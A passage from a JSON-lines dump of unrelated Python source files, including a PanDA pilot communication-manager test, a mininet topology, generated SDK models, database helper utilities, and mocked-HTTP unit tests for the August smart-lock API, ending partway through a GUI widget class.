the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Authors:\n# - Wen Guan, wen.guan@cern.ch, 2018\n\nimport json\nimport logging\nimport os\nimport socket\nimport sys\nimport time\n\nfrom pilot.eventservice.communicationmanager.communicationmanager import CommunicationRequest, CommunicationResponse, CommunicationManager\nfrom pilot.util.https import https_setup\nfrom pilot.util.timing import time_stamp\n\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\n\nlogging.basicConfig(stream=sys.stderr, level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\n\nhttps_setup(None, None)\n\n\ndef check_env():\n \"\"\"\n Function to check whether cvmfs is available.\n To be used to decide whether to skip some test functions.\n\n :returns True: if cvmfs is available. Otherwise False.\n \"\"\"\n return os.path.exists('/cvmfs/atlas.cern.ch/repo/')\n\n\nclass TestESCommunicationrRequestResponse(unittest.TestCase):\n \"\"\"\n Unit tests for event service communicator Request and Response.\n \"\"\"\n\n def test_communicator_request(self):\n \"\"\"\n Make sure that es message thread works as expected.\n \"\"\"\n req_attrs = {'request_type': CommunicationRequest.RequestType.RequestJobs,\n 'num_jobs': 1, 'post_hook': None, 'response': None}\n req_job = CommunicationRequest(req_attrs)\n self.assertEqual(req_job.request_type, CommunicationRequest.RequestType.RequestJobs)\n\n req_attrs = {'request_type': CommunicationRequest.RequestType.RequestEvents,\n 'num_event_ranges': 1, 'post_hook': None, 'response': None}\n req_events = CommunicationRequest(req_attrs)\n self.assertEqual(req_events.request_type, CommunicationRequest.RequestType.RequestEvents)\n\n req_attrs = {'request_type': CommunicationRequest.RequestType.UpdateEvents,\n 'output_files': None, 'post_hook': None, 'response': None}\n req_output = CommunicationRequest(req_attrs)\n self.assertEqual(req_output.request_type, CommunicationRequest.RequestType.UpdateEvents)\n\n resp_attrs = {'status': 0, 'content': None, 'exception': None}\n resp = CommunicationResponse(resp_attrs)\n self.assertEqual(resp.status, 0)\n\n\nclass TestESCommunicationManagerPanda(unittest.TestCase):\n \"\"\"\n Unit tests for event service communicator manager.\n \"\"\"\n\n @unittest.skipIf(not check_env(), \"No CVMFS\")\n def test_communicator_manager(self):\n \"\"\"\n Make sure that es communicator manager thread works as expected.\n \"\"\"\n communicator_manager = None\n try:\n args = {'workflow': 'eventservice_hpc',\n 'queue': 'BNL_CLOUD_MCORE',\n 'site': 'BNL_CLOUD_MCORE',\n 'port': 25443,\n 'url': 'https://aipanda007.cern.ch',\n 'job_label': 'ptest',\n 'pilot_user': 'ATLAS',\n 'node': socket.getfqdn(),\n 'mem': 16000,\n 'disk_space': 160000,\n 'working_group': '',\n 'cpu': 2601.0,\n 'info': None}\n\n communicator_manager = CommunicationManager()\n communicator_manager.start()\n self.assertTrue(communicator_manager.is_alive())\n\n jobs = communicator_manager.get_jobs(njobs=2, args=args)\n self.assertEqual(len(jobs), 2)\n\n jobs = communicator_manager.get_jobs(njobs=1, args=args)\n self.assertEqual(len(jobs), 1)\n\n job_list = []\n for job in jobs:\n job_data = {'node': socket.getfqdn(),\n 'pilotErrorCode': 0,\n 'startTime': time.time(),\n 'jobMetrics': 'coreCount=8',\n 'schedulerID': 'unknown',\n 'timestamp': time_stamp(),\n 'exeErrorCode': 0,\n 'pilotID': 'unknown|PR|2.0.0 (80)',\n 'transExitCode': 0,\n 'pilotErrorDiag': '',\n 'exeErrorDiag': ''}\n job_data['jobId'] = job['PandaID']\n job_data['siteName'] = 'BNL_CLOUD_MCORE'\n job_data['state'] = 'running'\n job_data['attemptNr'] = job['attemptNr'] + 1\n job_list.append(job_data)\n status = communicator_manager.update_jobs(jobs=job_list)\n self.assertEqual(status[0], True)\n\n events = communicator_manager.get_event_ranges(num_event_ranges=1, job=jobs[0])\n self.assertEqual(len(events), 1)\n\n for event in events:\n event_range_status = {\"errorCode\": 1220, \"eventRangeID\": event['eventRangeID'], \"eventStatus\": 'failed'}\n event_range_message = {'version': 0, 'eventRanges': json.dumps(event_range_status)}\n res = communicator_manager.update_events(update_events=event_range_message)\n self.assertEqual(res['StatusCode'], 0)\n\n events = communicator_manager.get_event_ranges(num_event_ranges=2, job=jobs[0])\n self.assertEqual(len(events), 2)\n\n update_events = []\n for event in events:\n event_range = {\"eventRangeID\": event['eventRangeID'], \"eventStatus\": 'finished'}\n update_events.append(event_range)\n event_range_status = [{\"zipFile\": {\"numEvents\": len(update_events),\n \"objstoreID\": 1318,\n \"adler32\": '000000',\n \"lfn\": 'test_file',\n \"fsize\": 100,\n \"pathConvention\": 1000},\n \"eventRanges\": update_events}]\n\n event_range_message = {'version': 1, 'eventRanges': json.dumps(event_range_status)}\n res = communicator_manager.update_events(update_events=event_range_message)\n self.assertEqual(res['StatusCode'], 0)\n\n communicator_manager.stop()\n time.sleep(2)\n self.assertFalse(communicator_manager.is_alive())\n except Exception as ex:\n if communicator_manager:\n communicator_manager.stop()\n raise ex\n"} {"ext": "py", "sha": "1a2f79211a981df605f777d54bf91b6cdc9b7585", "content": "\"\"\"\nswat-s1 topology\n\"\"\"\n\nfrom mininet.topo import Topo as TopoBase\n\nfrom srve import Srve\nfrom clie import Clie\n\nclass Topoe(TopoBase):\n NETMASK = '/24'\n NODES = [Srve, Clie]\n\n def build(self):\n\n switch = self.addSwitch('s1')\n\n for node in Topoe.NODES:\n host = self.addHost(\n node.NAME,\n ip=node.IP + Topoe.NETMASK,\n mac=node.MAC)\n self.addLink(host, switch)\n"} {"ext": "py", "sha": "1a2f7a212ac92f228456c65764e952ea192e27f2", "content": "# type: ignore[attr-defined]\nfrom solids import example_two_solid # pylint: disable=no-name-in-module\n\nfrom dagster import pipeline\n\n\n@pipeline\ndef example_two_pipeline():\n example_two_solid()\n"} {"ext": "py", "sha": "1a2f7a2694a13bd2fa3ec9c15e13fbabb9667170", "content": "\"\"\"\n MSX SDK\n\n MSX SDK client. # noqa: E501\n\n The version of the OpenAPI document: 1.0.9\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport re # noqa: F401\nimport sys # noqa: F401\n\nfrom python_msx_sdk.model_utils import ( # noqa: F401\n ApiTypeError,\n ModelComposed,\n ModelNormal,\n ModelSimple,\n cached_property,\n change_keys_js_to_python,\n convert_js_args_to_python_args,\n date,\n datetime,\n file_type,\n none_type,\n validate_get_composed_info,\n)\n\n\nclass GenericEventSecurity(ModelNormal):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n\n Attributes:\n allowed_values (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). The value is a dict\n with a capitalized key describing the allowed value and an allowed\n value. These dicts store the allowed enum values.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n discriminator_value_class_map (dict): A dict to go from the discriminator\n variable value to the discriminator class name.\n validations (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). The value is a dict\n that stores validations for max_length, min_length, max_items,\n min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,\n inclusive_minimum, and regex.\n additional_properties_type (tuple): A tuple of classes accepted\n as additional properties values.\n \"\"\"\n\n allowed_values = {\n }\n\n validations = {\n }\n\n additional_properties_type = None\n\n _nullable = False\n\n @cached_property\n def openapi_types():\n \"\"\"\n This must be a method because a model may have properties that are\n of type self, this must run after the class is loaded\n\n Returns\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n \"\"\"\n return {\n 'client_id': (str,), # noqa: E501\n 'user_id': (str,), # noqa: E501\n 'username': (str,), # noqa: E501\n 'tenant_id': (str,), # noqa: E501\n 'tenant_name': (str,), # noqa: E501\n 'provider_id': (str,), # noqa: E501\n 'original_username': (str,), # noqa: E501\n }\n\n @cached_property\n def discriminator():\n return None\n\n\n attribute_map = {\n 'client_id': 'clientId', # noqa: E501\n 'user_id': 'userId', # noqa: E501\n 'username': 'username', # noqa: E501\n 'tenant_id': 'tenantId', # noqa: E501\n 'tenant_name': 'tenantName', # noqa: E501\n 'provider_id': 'providerId', # noqa: E501\n 'original_username': 'originalUsername', # noqa: E501\n }\n\n _composed_schemas = {}\n\n required_properties = set([\n '_data_store',\n '_check_type',\n '_spec_property_naming',\n '_path_to_item',\n '_configuration',\n '_visited_composed_classes',\n ])\n\n @convert_js_args_to_python_args\n def __init__(self, *args, **kwargs): # noqa: E501\n \"\"\"GenericEventSecurity - a model defined in OpenAPI\n\n Keyword Args:\n _check_type (bool): if True, values for parameters in openapi_types\n will be type checked and a TypeError will be\n raised if the wrong type is input.\n Defaults to True\n _path_to_item (tuple/list): This is a list of keys or values to\n drill down to the model in received_data\n when deserializing a response\n _spec_property_naming (bool): True if the variable names in the input data\n are serialized names, as specified in the OpenAPI document.\n False if the variable names in the input data\n are pythonic names, e.g. snake case (default)\n _configuration (Configuration): the instance to use when\n deserializing a file_type parameter.\n If passed, type conversion is attempted\n If omitted no type conversion is done.\n _visited_composed_classes (tuple): This stores a tuple of\n classes that we have traveled through so that\n if we see that class again we will not use its\n discriminator again.\n When traveling through a discriminator, the\n composed schema that is\n is traveled through is added to this set.\n For example if Animal has a discriminator\n petType and we pass in \"Dog\", and the class Dog\n allOf includes Animal, we move through Animal\n once using the discriminator, and pick Dog.\n Then in Dog, we will make an instance of the\n Animal class but this time we won't travel\n through its discriminator because we passed in\n _visited_composed_classes = (Animal,)\n client_id (str): [optional] # noqa: E501\n user_id (str): [optional] # noqa: E501\n username (str): [optional] # noqa: E501\n tenant_id (str): [optional] # noqa: E501\n tenant_name (str): [optional] # noqa: E501\n provider_id (str): [optional] # noqa: E501\n original_username (str): [optional] # noqa: E501\n \"\"\"\n\n _check_type = kwargs.pop('_check_type', True)\n _spec_property_naming = kwargs.pop('_spec_property_naming', False)\n _path_to_item = kwargs.pop('_path_to_item', ())\n _configuration = kwargs.pop('_configuration', None)\n _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())\n\n if args:\n raise ApiTypeError(\n \"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.\" % (\n args,\n self.__class__.__name__,\n ),\n path_to_item=_path_to_item,\n valid_classes=(self.__class__,),\n )\n\n self._data_store = {}\n self._check_type = _check_type\n self._spec_property_naming = _spec_property_naming\n self._path_to_item = _path_to_item\n self._configuration = _configuration\n self._visited_composed_classes = _visited_composed_classes + (self.__class__,)\n\n for var_name, var_value in kwargs.items():\n if var_name not in self.attribute_map and \\\n self._configuration is not None and \\\n self._configuration.discard_unknown_keys and \\\n self.additional_properties_type is None:\n # discard variable.\n continue\n setattr(self, var_name, var_value)\n"} {"ext": "py", "sha": "1a2f7a2dd3ba13c02f9753f956bad38c6cb3d724", "content": "import typing\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.exc import OperationalError\n\nfrom db_workers import DatabaseWorker\nfrom db_workers import MySQLWorker\nfrom db_workers import PostgreWorker\nfrom fields import DATABASE_NAME_FIELD_NAME\nfrom fields import FOLDER_NAME_FIELD_NAME\nfrom fields import LOCAL_TABLE_NAME_FILED_NAME\nfrom fields import TABLE_NAME_FIELD_NAME\n\n\ndef validate_get_data_request_body(\n required_fields: list, request_body: dict, local_db_worker\n) -> dict:\n # Check if all fields defined\n for f in required_fields:\n if f not in request_body:\n raise KeyError(f\"Field {f} not defined in request\")\n\n # If columns defined - check if all exits in database\n if \"columns\" in request_body:\n table_data = local_db_worker.get_table(local_table_name=request_body[\"table\"])\n for col in request_body[\"columns\"]:\n if col not in table_data.columns:\n KeyError(f\"Column {col} not found in table {request_body['table']}\")\n\n # If limit defined - check that it can be converter to float\n if \"limit\" in request_body:\n request_body[\"limit\"] = float(request_body[\"limit\"])\n\n return request_body\n\n\ndef get_existing_data(\n sql_session, table_class_object, target_attr: str = None\n) -> typing.List:\n if not getattr(table_class_object, \"__tablename__\"):\n raise ValueError(\"Получен неверный table_class_object.\")\n\n try:\n data = sql_session.query(table_class_object).all()\n except: # noqa: E722\n sql_session.rollback()\n\n return [getattr(i, target_attr) for i in data] if target_attr else data\n\n\ndef get_local_table_name_from_request(request_body: dict, local_worker):\n return (\n request_body[LOCAL_TABLE_NAME_FILED_NAME]\n if LOCAL_TABLE_NAME_FILED_NAME in request_body\n else local_worker.get_local_table_name(\n database_name=request_body[DATABASE_NAME_FIELD_NAME],\n folder_name=request_body[FOLDER_NAME_FIELD_NAME],\n table_name=request_body[TABLE_NAME_FIELD_NAME],\n )\n )\n\n\ndef get_worker(db_type: str) -> typing.Type[DatabaseWorker]: # noqa: TYP006\n if db_type == \"postgres\":\n return PostgreWorker\n elif db_type == \"mysql\":\n return MySQLWorker\n\n\ndef database_health_check(engine) -> bool:\n try:\n engine.connect()\n return True\n except OperationalError:\n return False\n\n\ndef get_db_engine(db_type: str, **con_params):\n if db_type == \"postgres\":\n return create_engine(\n f\"postgresql://{con_params.get('username')}:{con_params.get('password')}@\"\n f\"{con_params.get('ip')}:{con_params.get('port')}/{con_params.get('database')}\"\n )\n elif db_type == \"mysql\":\n return create_engine(\n f\"mysql://{con_params.get('username')}:{con_params.get('password')}@\"\n f\"{con_params.get('ip')}:{con_params.get('port')}/{con_params.get('database')}\"\n )\n\n\ndef get_bad_request_answer() -> list:\n return [{\"status\": \"error\", \"message\": \"Incorrect request\"}, 400]\n\n\ndef update_data_about_db_structure(local_worker):\n \"\"\"\n This function iterates through all databases and refreshes its structure data (about tables/schemas)\n :param local_worker: object of LocalBaseWorker\n \"\"\"\n for local_base_name in local_worker.get_db_name_list():\n db_type = local_worker.get_database_object(local_base_name).type\n worker = get_worker(db_type)(local_base_name, local_worker)\n tables = worker.download_table_list()\n\n # After rescan add grant access for admin tokens\n for token_obj in local_worker.get_admin_tokens_objects_list():\n\n token = token_obj.token\n\n for local_table_name in tables:\n if local_table_name not in list(token_obj.granted_tables):\n local_worker.add_table_for_token(\n token, local_table_name=local_table_name\n )\n"} {"ext": "py", "sha": "1a2f7a63cc38b8b547f26d1bba451999cce801a8", "content": "from . import losses, layers\n"} {"ext": "py", "sha": "1a2f7c0f84f644a7c275dcc3f9d9319e214a6e7d", "content": "import os\nimport unittest\nfrom datetime import datetime\n\nimport requests_mock\nfrom dateutil.tz import tzutc\n\nfrom august.api import API_GET_DOORBELLS_URL, Api, API_GET_LOCKS_URL, \\\n API_GET_LOCK_STATUS_URL, API_LOCK_URL, API_UNLOCK_URL, API_GET_LOCK_URL, \\\n API_GET_DOORBELL_URL, API_GET_PINS_URL\nfrom august.lock import LockStatus, LockDoorStatus\n\nACCESS_TOKEN = \"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9\"\n\n\ndef load_fixture(filename):\n \"\"\"Load a fixture.\"\"\"\n path = os.path.join(os.path.dirname(__file__), 'fixtures', filename)\n with open(path) as fptr:\n return fptr.read()\n\n\ndef utc_of(year, month, day, hour, minute, second, microsecond):\n return datetime(year, month, day, hour, minute, second, microsecond,\n tzinfo=tzutc())\n\n\nclass TestApi(unittest.TestCase):\n @requests_mock.Mocker()\n def test_get_doorbells(self, mock):\n mock.register_uri(\n \"get\",\n API_GET_DOORBELLS_URL,\n text=load_fixture(\"get_doorbells.json\"))\n\n api = Api()\n doorbells = sorted(api.get_doorbells(ACCESS_TOKEN),\n key=lambda d: d.device_id)\n\n self.assertEqual(2, len(doorbells))\n\n first = doorbells[0]\n self.assertEqual(\"1KDAbJH89XYZ\", first.device_id)\n self.assertEqual(\"aaaaR08888\", first.serial_number)\n self.assertEqual(\"Back Door\", first.device_name)\n self.assertEqual(\"doorbell_call_status_offline\", first.status)\n self.assertEqual(False, first.has_subscription)\n self.assertEqual(None, first.image_url)\n self.assertEqual(\"3dd2accadddd\", first.house_id)\n\n second = doorbells[1]\n self.assertEqual(\"K98GiDT45GUL\", second.device_id)\n self.assertEqual(\"tBXZR0Z35E\", second.serial_number)\n self.assertEqual(\"Front Door\", second.device_name)\n self.assertEqual(\"doorbell_call_status_online\", second.status)\n self.assertEqual(True, second.has_subscription)\n self.assertEqual(\"https://image.com/vmk16naaaa7ibuey7sar.jpg\",\n second.image_url)\n self.assertEqual(\"3dd2accaea08\", second.house_id)\n\n @requests_mock.Mocker()\n def test_get_doorbell_detail(self, mock):\n mock.register_uri(\n \"get\",\n API_GET_DOORBELL_URL.format(doorbell_id=\"K98GiDT45GUL\"),\n text=load_fixture(\"get_doorbell.json\"))\n\n api = Api()\n doorbell = api.get_doorbell_detail(ACCESS_TOKEN, \"K98GiDT45GUL\")\n\n self.assertEqual(\"K98GiDT45GUL\", doorbell.device_id)\n self.assertEqual(\"Front Door\", doorbell.device_name)\n self.assertEqual(\"3dd2accaea08\", doorbell.house_id)\n self.assertEqual(\"tBXZR0Z35E\", doorbell.serial_number)\n self.assertEqual(\"2.3.0-RC153+201711151527\", doorbell.firmware_version)\n self.assertEqual(\"doorbell_call_status_online\", doorbell.status)\n self.assertEqual(True, doorbell.is_online)\n self.assertEqual(True, doorbell.has_subscription)\n self.assertEqual(\"https://image.com/vmk16naaaa7ibuey7sar.jpg\",\n doorbell.image_url)\n\n @requests_mock.Mocker()\n def test_get_locks(self, mock):\n mock.register_uri(\n \"get\",\n API_GET_LOCKS_URL,\n text=load_fixture(\"get_locks.json\"))\n\n api = Api()\n locks = sorted(api.get_locks(ACCESS_TOKEN), key=lambda d: d.device_id)\n\n self.assertEqual(2, len(locks))\n\n first = locks[0]\n self.assertEqual(\"A6697750D607098BAE8D6BAA11EF8063\", first.device_id)\n self.assertEqual(\"Front Door Lock\", first.device_name)\n self.assertEqual(\"000000000000\", first.house_id)\n self.assertEqual(True, first.is_operable)\n\n second = locks[1]\n self.assertEqual(\"A6697750D607098BAE8D6BAA11EF9999\", second.device_id)\n self.assertEqual(\"Back Door Lock\", second.device_name)\n self.assertEqual(\"000000000011\", second.house_id)\n self.assertEqual(False, second.is_operable)\n\n @requests_mock.Mocker()\n def test_get_operable_locks(self, mock):\n mock.register_uri(\n \"get\",\n API_GET_LOCKS_URL,\n text=load_fixture(\"get_locks.json\"))\n\n api = Api()\n locks = api.get_operable_locks(ACCESS_TOKEN)\n\n self.assertEqual(1, len(locks))\n\n first = locks[0]\n self.assertEqual(\"A6697750D607098BAE8D6BAA11EF8063\", first.device_id)\n self.assertEqual(\"Front Door Lock\", first.device_name)\n self.assertEqual(\"000000000000\", first.house_id)\n self.assertEqual(True, first.is_operable)\n\n @requests_mock.Mocker()\n def test_get_lock_detail(self, mock):\n mock.register_uri(\n \"get\",\n API_GET_LOCK_URL.format(\n lock_id=\"A6697750D607098BAE8D6BAA11EF8063\"),\n text=load_fixture(\"get_lock.json\"))\n\n api = Api()\n lock = api.get_lock_detail(ACCESS_TOKEN,\n \"A6697750D607098BAE8D6BAA11EF8063\")\n\n self.assertEqual(\"A6697750D607098BAE8D6BAA11EF8063\", lock.device_id)\n self.assertEqual(\"Front Door Lock\", lock.device_name)\n self.assertEqual(\"000000000000\", lock.house_id)\n self.assertEqual(\"X2FSW05DGA\", lock.serial_number)\n self.assertEqual(\"109717e9-3.0.44-3.0.30\", lock.firmware_version)\n self.assertEqual(88, lock.battery_level)\n self.assertEqual(\"Medium\", lock.keypad.battery_level)\n self.assertEqual(\"5bc65c24e6ef2a263e1450a8\", lock.keypad.device_id)\n\n @requests_mock.Mocker()\n def test_get_lock_status_with_locked_response(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"get\",\n API_GET_LOCK_STATUS_URL.format(lock_id=lock_id),\n text=\"{\\\"status\\\": \\\"kAugLockState_Locked\\\"}\")\n\n api = Api()\n status = api.get_lock_status(ACCESS_TOKEN, lock_id)\n\n self.assertEqual(LockStatus.LOCKED, status)\n\n @requests_mock.Mocker()\n def test_get_lock_and_door_status_with_locked_response(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"get\",\n API_GET_LOCK_STATUS_URL.format(lock_id=lock_id),\n text=\"{\\\"status\\\": \\\"kAugLockState_Locked\\\"\"\n \",\\\"doorState\\\": \\\"kAugLockDoorState_Closed\\\"}\")\n\n api = Api()\n status, door_status = api.get_lock_status(ACCESS_TOKEN, lock_id, True)\n\n self.assertEqual(LockStatus.LOCKED, status)\n self.assertEqual(LockDoorStatus.CLOSED, door_status)\n\n @requests_mock.Mocker()\n def test_get_lock_status_with_unlocked_response(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"get\",\n API_GET_LOCK_STATUS_URL.format(lock_id=lock_id),\n text=\"{\\\"status\\\": \\\"kAugLockState_Unlocked\\\"}\")\n\n api = Api()\n status = api.get_lock_status(ACCESS_TOKEN, lock_id)\n\n self.assertEqual(LockStatus.UNLOCKED, status)\n\n @requests_mock.Mocker()\n def test_get_lock_status_with_unknown_status_response(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"get\",\n API_GET_LOCK_STATUS_URL.format(lock_id=lock_id),\n text=\"{\\\"status\\\": \\\"not_advertising\\\"}\")\n\n api = Api()\n status = api.get_lock_status(ACCESS_TOKEN, lock_id)\n\n self.assertEqual(LockStatus.UNKNOWN, status)\n\n @requests_mock.Mocker()\n def test_get_lock_door_status_with_closed_response(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"get\",\n API_GET_LOCK_STATUS_URL.format(lock_id=lock_id),\n text=\"{\\\"doorState\\\": \\\"kAugLockDoorState_Closed\\\"}\")\n\n api = Api()\n door_status = api.get_lock_door_status(ACCESS_TOKEN, lock_id)\n\n self.assertEqual(LockDoorStatus.CLOSED, door_status)\n\n @requests_mock.Mocker()\n def test_get_lock_door_status_with_open_response(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"get\",\n API_GET_LOCK_STATUS_URL.format(lock_id=lock_id),\n text=\"{\\\"doorState\\\": \\\"kAugLockDoorState_Open\\\"}\")\n\n api = Api()\n door_status = api.get_lock_door_status(ACCESS_TOKEN, lock_id)\n\n self.assertEqual(LockDoorStatus.OPEN, door_status)\n\n @requests_mock.Mocker()\n def test_get_lock_and_door_status_with_open_response(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"get\",\n API_GET_LOCK_STATUS_URL.format(lock_id=lock_id),\n text=\"{\\\"status\\\": \\\"kAugLockState_Unlocked\\\"\"\n \",\\\"doorState\\\": \\\"kAugLockDoorState_Open\\\"}\")\n\n api = Api()\n door_status, status = api.get_lock_door_status(ACCESS_TOKEN, lock_id,\n True)\n\n self.assertEqual(LockDoorStatus.OPEN, door_status)\n self.assertEqual(LockStatus.UNLOCKED, status)\n\n @requests_mock.Mocker()\n def test_get_lock_door_status_with_unknown_response(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"get\",\n API_GET_LOCK_STATUS_URL.format(lock_id=lock_id),\n text=\"{\\\"doorState\\\": \\\"not_advertising\\\"}\")\n\n api = Api()\n door_status = api.get_lock_door_status(ACCESS_TOKEN, lock_id)\n\n self.assertEqual(LockDoorStatus.UNKNOWN, door_status)\n\n @requests_mock.Mocker()\n def test_lock(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"put\",\n API_LOCK_URL.format(lock_id=lock_id),\n text=\"{\\\"status\\\":\\\"locked\\\",\"\n \"\\\"dateTime\\\":\\\"2017-12-10T07:43:39.056Z\\\",\"\n \"\\\"isLockStatusChanged\\\":false,\"\n \"\\\"valid\\\":true}\")\n\n api = Api()\n status = api.lock(ACCESS_TOKEN, lock_id)\n\n self.assertEqual(LockStatus.LOCKED, status)\n\n @requests_mock.Mocker()\n def test_unlock(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"put\",\n API_UNLOCK_URL.format(lock_id=lock_id),\n text=\"{\\\"status\\\": \\\"unlocked\\\"}\")\n\n api = Api()\n status = api.unlock(ACCESS_TOKEN, lock_id)\n\n self.assertEqual(LockStatus.UNLOCKED, status)\n\n @requests_mock.Mocker()\n def test_get_pins(self, mock):\n lock_id = 1234\n mock.register_uri(\n \"get\",\n API_GET_PINS_URL.format(lock_id=lock_id),\n text=load_fixture(\"get_pins.json\"))\n\n api = Api()\n pins = api.get_pins(ACCESS_TOKEN, lock_id)\n\n self.assertEqual(1, len(pins))\n\n first = pins[0]\n self.assertEqual(\"epoZ87XSPqxlFdsaYyJiRRVR\", first.pin_id)\n self.assertEqual(\"A6697750D607098BAE8D6BAA11EF8063\", first.lock_id)\n self.assertEqual(\"c3b3a94f-473z-61a3-a8d1-a6e99482787a\", first.user_id)\n self.assertEqual(\"in-use\", first.state)\n self.assertEqual(\"123456\", first.pin)\n self.assertEqual(646545456465161, first.slot)\n self.assertEqual(\"one-time\", first.access_type)\n self.assertEqual(\"John\", first.first_name)\n self.assertEqual(\"Doe\", first.last_name)\n self.assertEqual(True, first.unverified)\n self.assertEqual(utc_of(2016, 11, 26, 22, 27, 11, 176000),\n first.created_at)\n self.assertEqual(utc_of(2017, 11, 23, 00, 42, 19, 470000),\n first.updated_at)\n self.assertEqual(utc_of(2017, 12, 10, 3, 12, 55, 563000),\n first.loaded_date)\n self.assertEqual(utc_of(2018, 1, 1, 1, 1, 1, 563000),\n first.access_start_time)\n self.assertEqual(utc_of(2018, 12, 1, 1, 1, 1, 563000),\n first.access_end_time)\n self.assertEqual(utc_of(2018, 11, 5, 10, 2, 41, 684000),\n first.access_times)\n"} {"ext": "py", "sha": "1a2f7c408e191d644b96e8c0d1b6b78823f95403", "content": "# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass SsoUri(Model):\n \"\"\"The URI required to login to the supplemental portal from the Azure portal.\n\n Variables are only populated by the server, and will be ignored when\n sending a request.\n\n :ivar sso_uri_value: The URI used to login to the supplemental portal.\n :vartype sso_uri_value: str\n \"\"\"\n\n _validation = {\n 'sso_uri_value': {'readonly': True},\n }\n\n _attribute_map = {\n 'sso_uri_value': {'key': 'ssoUriValue', 'type': 'str'},\n }\n\n def __init__(self, **kwargs):\n super(SsoUri, self).__init__(**kwargs)\n self.sso_uri_value = None\n"} {"ext": "py", "sha": "1a2f7e4e526e3e92e2a43901f135e68cba2e1455", "content": "#------------------------------------------------------------------------------\n# Copyright (c) 2005, Enthought, Inc.\n# All rights reserved.\n# \n# This software is provided without warranty under the terms of the BSD\n# license included in enthought/LICENSE.txt and may be redistributed only\n# under the conditions described in the aforementioned license. The license\n# is also available online at http://www.enthought.com/licenses/BSD.txt\n# Thanks for using Enthought open source!\n# \n# Author: David C. Morrill\n# Date: 12/02/2004\n# Description: Defines a Tkinter ImageControl widget that is used by various\n# trait editors to display trait values iconically.\n#\n# Symbols defined: ImageControl\n#\n#------------------------------------------------------------------------------\n\n#-------------------------------------------------------------------------------\n# Imports:\n#-------------------------------------------------------------------------------\n \nimport tk\n\n#-------------------------------------------------------------------------------\n# 'ImageControl' class:\n#-------------------------------------------------------------------------------\n \nclass ImageControl ( wx.Window ):\n\n # Pens used to draw the 'selection' marker:\n _selectedPenDark = wx.Pen( \n wx.SystemSettings_GetColour( wx.SYS_COLOUR_3DSHADOW ), 1, \n wx.SOLID )\n _selectedPenLight = wx.Pen( \n wx.SystemSettings_GetColour( wx.SYS_COLOUR_3DHIGHLIGHT ), 1, \n wx.SOLID )\n \n #---------------------------------------------------------------------------\n # Initializes the object:\n #---------------------------------------------------------------------------\n \n def __init__ ( self, parent, bitmap, selected = None, handler = None ):\n \"\"\" Initializes the object.\n \"\"\"\n wx.Window.__init__( self, parent, -1, \n size = wx.Size( bitmap.GetWidth() + 10, \n bitmap.GetHeight() + 10 ) )\n self._bitmap = bitmap\n self._selected = selected\n self._handler = handler\n self._mouse_over = False\n self._button_down = False\n \n # Set up the 'paint' event handler:\n wx.EVT_PAINT( self, self._on_paint )\n \n # Set up mouse event handlers:\n wx.EVT_LEFT_DOWN( self, self._on_left_down )\n wx.EVT_LEFT_UP( self, self._on_left_up )\n wx.EVT_ENTER_WINDOW( self, self._on_enter )\n wx.EVT_LEAVE_WINDOW( self, self._on_leave )\n \n #---------------------------------------------------------------------------\n # Gets/Sets the current selection state of the image: \n #---------------------------------------------------------------------------\n \n def Selected ( self, selected = None ):\n \"\"\" Gets/Sets the current selection state of the image.\n \"\"\"\n if selected is not None:\n selected = (selected != 0)\n if selected != self._selected:\n if selected:\n for control in self.GetParent().GetChildren():\n if (isinstance( control, ImageControl ) and \n control.Selected()):\n control.Selected( False )\n break\n self._selected = selected\n self.Refresh()\n return self._selected\n \n #---------------------------------------------------------------------------\n # Gets/Sets the current bitmap image: \n #---------------------------------------------------------------------------\n \n def Bitmap ( self, bitmap = None ):\n if bitmap is not None:\n if bitmap != self._bitmap:\n self._bitmap = bitmap\n self.Refresh()\n return self._bitmap\n \n #---------------------------------------------------------------------------\n # Gets/Sets the current click handler:\n #---------------------------------------------------------------------------\n \n def Handler ( self, handler = None ):\n \"\"\" Gets/Sets the current click handler.\n \"\"\"\n if handler is not None:\n if handler != self._handler:\n self._handler = handler\n self.Refresh()\n return self._handler\n \n #---------------------------------------------------------------------------\n # Handles the mouse entering the control: \n #---------------------------------------------------------------------------\n \n def _on_enter ( self, event = None ):\n \"\"\" Handles the mouse entering the control.\n \"\"\"\n if self._selected is not None:\n self._mouse_over = True\n self.Refresh()\n \n #---------------------------------------------------------------------------\n # Handles the mouse leaving the control: \n #---------------------------------------------------------------------------\n \n def _on_leave ( self, event = None ):\n \"\"\" Handles the mouse leaving the control.\n \"\"\"\n if self._mouse_over:\n self._mouse_over = False\n self.Refresh()\n \n #---------------------------------------------------------------------------\n # Handles the user pressing the mouse button: \n #---------------------------------------------------------------------------\n \n def _on_left_down ( self, event = None ):\n \"\"\" Handles the user 